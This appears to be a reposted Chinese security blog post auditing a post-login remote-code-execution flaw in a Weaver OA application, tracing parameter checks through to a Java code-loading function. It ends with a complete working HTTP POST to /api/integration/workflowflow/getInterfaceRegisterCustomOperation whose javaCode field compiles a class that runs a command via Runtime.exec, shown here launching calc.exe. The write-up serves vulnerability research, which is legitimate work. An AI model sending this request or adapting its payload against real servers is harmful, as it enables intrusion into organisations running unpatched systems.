某微1day后台RCE审计漏洞

渗透技巧 2年前 (2023) admin
605 0 0

某微1day后台RCE审计漏洞

某应用存在后台RCE,根据相关信息,我们在对后台审计过程,这里发现一处调用newInstance实例化


某微1day后台RCE审计漏洞


溯源找到InterfaceRegisterCustomOperationCmd #excute


某微1day后台RCE审计漏洞

某微1day后台RCE审计漏洞

某微1day后台RCE审计漏洞

某微1day后台RCE审计漏洞


访问路径为 /api/integration/workflowflow/getInterfaceRegisterCustomOperation


getInterfaceRegisterCustomOperation调用了execute,首先判断了用户,所以这里是后台漏洞


某微1day后台RCE审计漏洞


因为我们需要这个污点函数JavaCodeToObject,所以要满足if的条件并且控制var18和var20


某微1day后台RCE审计漏洞


这里var14要为add


某微1day后台RCE审计漏洞


var14的值是从请求参数method取得,因为前面是指定POST方法所以这里method=add


某微1day后台RCE审计漏洞


进入if判断后var15的值如果为空就会return掉,所以这里actionid的值不为空就好,结合上面的条件就是method=add&actionid=1


某微1day后台RCE审计漏洞


这里var18的开头如果不是weaver.interfaces.workflow.action.javacode.Action将会进入下面的判断导致抛出异常,达不到我们想要的结果,所以这里classname=weaver.interfaces.workflow.action.javacode.Action,结合上面的参数method=add&actionid=1classname=weaver.interfaces.workflow.action.javacode.Action


某微1day后台RCE审计漏洞


下面var20值取自javacode参数,结合上面payload为method=add&actionid=1&classname=weaver.interfaces.workflow.action.javacode.Action&javacode=


某微1day后台RCE审计漏洞


if如果var18包含weaver.interfaces.workflow.action.javacode进入我们想要的javacodetoobject调用,所以classname=weaver.interfaces.workflow.action.javacode.Action.weaver.interfaces.workflow.action.javacode.Action两个条件用.连接否则会报加载异常


某微1day后台RCE审计漏洞


根据上面的条件都已满足var18和var20条件,构造var20的参数为 javacode=package weaver.interfaces.workflow.action.javacode.Action.weaver.interfaces.workflow.action.javacode; import java.io.IOException; public class test { static { try { Runtime.getRuntime().exec("calc.exe"); } catch (IOException e) { e.printStackTrace(); } } }这里将命令执行的代码放在静态代码块是因为实例化的时候会自动执行static中的代码,达到命令执行


某微1day后台RCE审计漏洞


实际发包好像没有利用成功,回头看一下代码 发现丢了个参数 dtinfo_CustomParameterData

POST /api/integration/workflowflow/getInterfaceRegisterCustomOperation HTTP/1.1
Host:
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.33
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: ecology_JSessionid=aaa8G6PRBnnBD82yi6Fky; JSESSIONID=aaa8G6PRBnnBD82yi6Fky; __randcode__=d2fa15e2-395e-4b3b-a004-82fc07c18695; loginidweaver=1; languageidweaver=7; loginuuids=1
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 548

method=add&actionid=1&classname=weaver.interfaces.workflow.action.javacode.Action.weaver.interfaces.workflow.action.javacode.Test&dtinfo_CustomParameterData=11&javaCode=package weaver.interfaces.workflow.action.javacode.Action.weaver.interfaces.workflow.action.javacode;
import java.io.IOException;
public class Test {
static {
try {
Runtime.getRuntime().exec("calc.exe");
} catch (IOException e) {
e.printStackTrace();
}
}
}


某微1day后台RCE审计漏洞




转载来自: https://xz.aliyun.com/t/11947


原文始发于微信公众号(渗透测试研究中心):某微1day后台RCE审计漏洞

版权声明:admin 发表于 2023年1月3日 下午1:34。
转载请注明:某微1day后台RCE审计漏洞 | CTF导航

相关文章

暂无评论

您必须登录才能参与评论!
立即登录
暂无评论...